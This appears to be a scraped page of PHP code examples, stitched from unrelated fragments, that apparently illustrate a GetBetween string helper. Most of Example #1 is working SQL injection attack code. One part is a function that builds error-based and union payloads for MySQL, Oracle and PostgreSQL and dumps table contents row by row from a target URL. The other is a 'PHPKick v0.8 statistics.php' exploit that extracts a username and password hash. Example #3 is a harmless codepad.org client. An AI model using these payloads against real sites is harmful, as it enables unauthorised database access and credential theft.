Example #1
0
function frame6()
{
    html_header();
    global $string3;
    global $action, $detectar_t;
    global $a, $payload_error, $b, $payload_union, $c, $payload_oracle, $d, $payload_postgre;
    if (isset($_POST['datos'])) {
        $url = $_POST["url"];
        $vuln_index = $_POST["lol"];
        $sobras = $_POST['sobras'];
        $nombre = $_POST['nombre'];
        $database = $_POST['database'];
        $tabla = $_POST['tn'];
        if (is_array($_POST['nombre']) == true) {
            foreach ($_POST['nombre'] as $nombres) {
                echo "<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" style=\"display: inline-block;vertical-align: top;\"><tr>";
                echo "<td>" . asciiEncode($nombres) . "</td>";
                if ($_POST['datos'] == 'data e-b') {
                    $mode = "mysql_error";
                    $query = $a[$vuln_index - 1];
                    $querys = str_replace("{$payload_error}", "(SELECT%207656%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20" . asciiEncode($database) . "." . $tabla . "),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)", $query);
                } elseif ($_POST['datos'] == 'data u-q') {
                    $mode = "mysql_union";
                    $query = $b[$vuln_index - 1];
                    $querys = str_replace("{$payload_union}", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)", $query);
                    $querys = str_replace("%23", "%20FROM%20" . asciiEncode($database) . "." . $tabla . "%23", $querys);
                } elseif ($_POST['datos'] == 'data o-eb') {
                    $mode = "oracle_error";
                    $query = $c[$vuln_index - 1];
                    $querys = str_replace("{$payload_oracle}", "(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20COUNT(" . asciiEncode($nombres) . ")%20FROM%20" . $database . "." . $tabla . ")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))", $query);
                } elseif ($_POST['datos'] == 'data pg') {
                    $mode = "postgre_error";
                    $query = $d[$vuln_index - 1];
                    $querys = str_replace("{$payload_postgre}", "(SELECT%20COALESCE(CAST(COUNT(%2A)%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public." . $tabla . ")", $query);
                }
                if ($mode == "mysql_error") {
                    $queryn = str_replace("{$payload_error}", '(SELECT%206968%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(' . asciiEncode($nombres) . '%20AS%20CHAR),0x20)),1,50)%20FROM%20' . asciiEncode($database) . '.' . $tabla . '%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $query);
                    $i = 0;
                    $count = GetBetween(get_url($url . $querys . $sobras)) - 1;
                } elseif ($mode == "mysql_union") {
                    $queryn = str_replace("{$payload_union}", '(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(' . asciiEncode($nombres) . '%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20' . asciiEncode($database) . '.' . $tabla . '%20LIMIT%20$i,1)', $query);
                    $i = 0;
                    $count = GetBetween(get_url($url . $querys . $sobras)) - 1;
                } elseif ($mode == "oracle_error") {
                    $queryn = str_replace("{$payload_oracle}", '(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(' . asciiEncode($nombres) . '%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20' . asciiEncode($nombres) . '%2CROWNUM%20AS%20LIMIT%20FROM%20' . $database . '.' . $tabla . '%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $query);
                    $i = 0;
                    $count = GetBetween(get_url($url . $querys . $sobras)) - 1;
                } elseif ($mode == "postgre_error") {
                    $queryn = str_replace("{$payload_postgre}", '(SELECT%20COALESCE(CAST(' . asciiEncode($nombres) . '%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public.' . $tabla . '%20OFFSET%20$i%20LIMIT%201)', $query);
                    $i = 0;
                    $count = GetBetween(get_url($url . $querys . $sobras)) - 1;
                }
                echo "</tr>";
                while ($i <= $count) {
                    $query_nombre = str_replace('$i', "{$i}", $queryn);
                    $nombre = GetBetween(get_url($url . $query_nombre . $sobras));
                    echo "<tr><td>" . $nombre . "</td>";
                    $i++;
                }
            }
            echo "</tr></table>";
        }
    }
}
    $spos = strpos($host, "http://");
    if (!is_int($spos) && $spos == 0) {
        $host = "http://{$host}";
    }
    if (!$host == "http://localhost") {
        $spos = strpos($host, "http://www.");
        if (!is_int($spos) && $spos == 0) {
            $host = "http://www.{$host}";
        }
    }
    $exploit = "statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f";
    echo "exploiting...\n";
    $source = file_get_contents($host . $path . $exploit);
    $username = GetBetween($source, " :<br>", ":");
    echo "username: {$username}\n";
    $hash = GetBetween($source, "<br>{$username}:", "</td>");
    echo "hash: {$hash}\n";
} else {
    echo "\n\n";
    echo "|=================PHPKick v0.8 statistics.php SQL Injection==================|\n";
    echo "|                                                                            |\n";
    echo "|Syntax: php " . $_SERVER['argv'][0] . " [host] [path]                                       |\n";
    echo "|                                                                            |\n";
    echo "|Example: php " . $_SERVER['argv'][0] . " http://www.domain.com /path/                       |\n";
    echo "|                                                                            |\n";
    echo "|Notes:This exploit works regardless of the PHP security settings            |\n";
    echo "|      (magic_quotes, register_globals).This exploit is only for educational |\n";
    echo "|      use, use it on your own risk! Exploiting scripts without permission of|\n";
    echo "|      the owner of the webspace is illegal!                                 |\n";
    echo "|      I'm not responsible for any resulting damage                          |\n";
    echo "|                                                                            |\n";
Example #3
0
<?php

$code = $_GET['code'];
$lang = $_GET['lang'];
$languages = array('c' => 'C', 'c++' => 'C++', 'd' => 'D', 'haskell' => 'Haskell', 'lua' => 'Lua', 'ocaml' => 'OCaml', 'php' => 'PHP', 'perl' => 'Perl', 'python' => 'Python', 'ruby' => 'Ruby', 'scheme' => 'Scheme', 'tcl' => 'Tcl', '2' => 'C++');
$url = 'http://codepad.org';
$data = array('code' => $code, 'lang' => $languages[strtolower($lang)], 'submit' => 'Submit', 'run' => "True", 'privite' => "True");
// use key 'http' even if you send the request to https://...
$options = array('http' => array('header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data)));
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
//getBetween($result,'<div class="highlight">','</div>');
$data = GetBetween('<a name="output">', '</td></tr></tbody></table>', $result);
echo strip_tags(GetBetween('<td width="100%" style="vertical-align: top">', '</td>', $data));
//echo(GetBetween('<div class="code">','</table>',$result));
function GetBetween($var1 = "", $var2 = "", $pool)
{
    $temp1 = strpos($pool, $var1) + strlen($var1);
    $result = substr($pool, $temp1, strlen($pool));
    $dd = strpos($result, $var2);
    if ($dd == 0) {
        $dd = strlen($result);
    }
    return substr($result, 0, $dd);
}